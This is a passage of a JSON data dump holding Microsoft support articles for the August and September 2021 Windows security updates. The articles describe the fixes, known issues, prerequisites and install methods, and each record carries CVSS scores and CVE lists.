cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005088](<https://support.microsoft.com/help/5005088>) (released August 10, 2021) and addresses the following issues:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006743](<https://support.microsoft.com/help/5006743>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007236](<https://support.microsoft.com/help/5007236>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006743](<https://support.microsoft.com/help/5006743>). If after installing [KB5006743](<https://support.microsoft.com/help/5006743>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005633>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005633](<https://download.microsoft.com/download/4/7/d/47d2fcaf-120b-46c1-8097-ecef0fae961f/5005633.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005633 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005633", "href": "https://support.microsoft.com/en-us/help/5005633", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:19", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004289](<https://support.microsoft.com/help/5004289>) (released July 13, 2021) and addresses the following issues:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005392](<https://support.microsoft.com/help/5005392>).\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**How to get this update****Symptom **| **Workaround ** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005088>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005088](<https://download.microsoft.com/download/5/1/c/51cfa686-f644-4875-b76b-610d21809361/5005088.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005088 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005088", "href": "https://support.microsoft.com/en-us/help/5005088", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1159) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 19041.1161, 19042.1161, and 19043.1161\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog:If your devices do not have the May 11, 2021 update (KB5003173) or later LCU, you **must **install the special standalone August 10, 2021 SSU (KB5005260).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005033>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005033](<https://download.microsoft.com/download/1/e/e/1eeb7268-cb6a-4865-a98b-9c51f0ec7beb/5005033.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1161, 19042.1161, and 19043.1161](<https://download.microsoft.com/download/f/7/4/f74513f3-7838-4538-89f5-8be86d571826/SSU_version_19041_1161.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005033 (OS Builds 19041.1165, 19042.1165, and 19043.1165)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005033", "href": "https://support.microsoft.com/en-us/help/5005033", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:20", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004305](<https://support.microsoft.com/help/5004305>) (released July 13, 2021) and addresses the following issues:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005390.](<https://support.microsoft.com/help/5005390>)\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation 